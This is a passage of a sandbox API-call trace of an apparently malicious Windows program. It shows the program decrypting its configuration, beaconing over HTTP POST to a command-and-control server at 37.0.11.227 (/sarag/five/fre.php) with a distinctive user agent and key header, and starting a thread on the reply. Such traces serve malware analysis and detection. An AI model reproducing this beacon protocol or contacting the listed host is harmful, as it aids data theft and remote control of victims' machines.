(lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0266.494] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.495] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0266.495] GetProcessHeap () returned 0x690000 [0266.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0266.495] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0266.495] GetProcessHeap () returned 0x690000 [0266.496] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0266.496] GetProcessHeap () returned 0x690000 [0266.496] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0266.496] GetProcessHeap () returned 0x690000 [0266.496] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0266.496] GetProcessHeap () returned 0x690000 [0266.496] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0266.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.498] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0266.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.518] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0266.525] GetProcessHeap () returned 0x690000 [0266.525] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0266.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.526] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0266.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.527] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0266.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.528] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0266.528] GetProcessHeap () returned 0x690000 [0266.529] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0266.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.530] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0266.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.531] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0266.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.532] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0266.532] GetProcessHeap () returned 0x690000 [0266.532] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0266.533] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.533] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0266.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.535] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0266.538] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.538] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0266.539] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.539] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0266.539] GetProcessHeap () returned 0x690000 [0266.539] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0266.539] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0266.540] GetProcessHeap () returned 0x690000 [0266.540] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4a0 [0266.540] socket (af=2, type=1, protocol=6) returned 0x7d0 [0266.540] connect (s=0x7d0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0266.569] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0266.569] GetProcessHeap () returned 0x690000 [0266.569] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0266.569] GetProcessHeap () returned 0x690000 [0266.569] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0266.570] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0266.570] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0266.571] GetProcessHeap () returned 0x690000 [0266.571] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af500 [0266.571] GetProcessHeap () returned 0x690000 [0266.571] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0266.571] GetProcessHeap () returned 0x690000 [0266.571] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0266.571] GetProcessHeap () returned 0x690000 [0266.571] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0266.572] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0266.573] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0266.573] GetProcessHeap () returned 0x690000 [0266.573] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0266.573] GetProcessHeap () returned 0x690000 [0266.573] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0266.573] send (s=0x7d0, buf=0x6ad508*, len=242, flags=0) returned 242 [0266.574] send (s=0x7d0, buf=0x6aba40*, len=159, flags=0) returned 159 [0266.574] GetProcessHeap () returned 0x690000 [0266.574] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0266.574] recv (in: s=0x7d0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0266.649] GetProcessHeap () returned 0x690000 [0266.649] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0266.649] GetProcessHeap () returned 0x690000 [0266.650] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0266.650] GetProcessHeap () returned 0x690000 [0266.650] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af500 | out: hHeap=0x690000) returned 1 [0266.651] GetProcessHeap () returned 0x690000 [0266.651] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0266.651] closesocket (s=0x7d0) returned 0 [0266.652] GetProcessHeap () returned 0x690000 [0266.652] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4a0 | out: hHeap=0x690000) returned 1 [0266.652] GetProcessHeap () returned 0x690000 [0266.652] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0266.652] GetProcessHeap () returned 0x690000 [0266.653] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0266.653] GetProcessHeap () returned 0x690000 [0266.653] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0266.653] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1584) returned 0x7d0 [0266.655] Sleep (dwMilliseconds=0xea60) [0266.656] GetProcessHeap () returned 0x690000 [0266.656] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0266.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.660] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0266.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.666] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0266.674] GetProcessHeap () returned 0x690000 [0266.674] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0266.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.675] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0266.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.677] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0266.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.686] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0266.686] GetProcessHeap () returned 0x690000 [0266.686] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0266.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.687] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0266.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.689] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0266.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.690] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0266.690] GetProcessHeap () returned 0x690000 [0266.690] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0266.691] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.691] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0266.692] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.692] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0266.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.693] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0266.694] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.694] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0266.694] GetProcessHeap () returned 0x690000 [0266.694] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0266.694] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0266.695] GetProcessHeap () returned 0x690000 [0266.695] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0266.695] GetProcessHeap () returned 0x690000 [0266.696] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0266.696] GetProcessHeap () returned 0x690000 [0266.696] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0266.696] GetProcessHeap () returned 0x690000 [0266.696] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0266.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.697] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0266.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.707] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0266.717] GetProcessHeap () returned 0x690000 [0266.717] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0266.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.718] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0266.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.719] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0266.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.721] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0266.721] GetProcessHeap () returned 0x690000 [0266.721] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0266.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.722] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0266.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.725] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0266.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.726] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0266.726] GetProcessHeap () returned 0x690000 [0266.726] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0266.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.727] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0266.728] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.729] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0266.729] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.730] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0266.731] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.731] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0266.731] GetProcessHeap () returned 0x690000 [0266.731] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0266.731] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0266.731] GetProcessHeap () returned 0x690000 [0266.731] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0266.732] socket (af=2, type=1, protocol=6) returned 0x7d4 [0266.732] connect (s=0x7d4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0266.759] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0266.759] GetProcessHeap () returned 0x690000 [0266.759] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0266.759] GetProcessHeap () returned 0x690000 [0266.759] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0266.760] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0266.760] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0266.760] GetProcessHeap () returned 0x690000 [0266.760] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0266.760] GetProcessHeap () returned 0x690000 [0266.761] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0266.761] GetProcessHeap () returned 0x690000 [0266.761] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0266.761] GetProcessHeap () returned 0x690000 [0266.761] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0266.762] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0266.763] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0266.763] GetProcessHeap () returned 0x690000 [0266.763] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0266.763] GetProcessHeap () returned 0x690000 [0266.764] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0266.764] send (s=0x7d4, buf=0x6ad508*, len=242, flags=0) returned 242 [0266.764] send (s=0x7d4, buf=0x6aba40*, len=159, flags=0) returned 159 [0266.764] GetProcessHeap () returned 0x690000 [0266.764] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0266.764] recv (in: s=0x7d4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0266.851] GetProcessHeap () returned 0x690000 [0266.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0266.852] GetProcessHeap () returned 0x690000 [0266.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0266.852] GetProcessHeap () returned 0x690000 [0266.853] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0266.853] GetProcessHeap () returned 0x690000 [0266.853] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0266.854] closesocket (s=0x7d4) returned 0 [0266.854] GetProcessHeap () returned 0x690000 [0266.854] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0266.854] GetProcessHeap () returned 0x690000 [0266.855] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0266.855] GetProcessHeap () returned 0x690000 [0266.855] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0266.855] GetProcessHeap () returned 0x690000 [0266.856] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0266.865] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1588) returned 0x7d4 [0266.871] Sleep (dwMilliseconds=0xea60) [0266.873] GetProcessHeap () returned 0x690000 [0266.873] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0266.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.881] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0266.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.899] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0266.906] GetProcessHeap () returned 0x690000 [0266.906] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0266.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.908] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0266.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.911] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0266.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.916] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0266.916] GetProcessHeap () returned 0x690000 [0266.916] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0266.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.918] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0266.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.919] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0266.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.923] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0266.923] GetProcessHeap () returned 0x690000 [0266.923] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0266.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.924] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0266.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.925] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0266.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.926] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0266.927] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.927] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0266.927] GetProcessHeap () returned 0x690000 [0266.927] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0266.927] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0266.927] GetProcessHeap () returned 0x690000 [0266.928] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0266.928] GetProcessHeap () returned 0x690000 [0266.928] HeapFree (in: 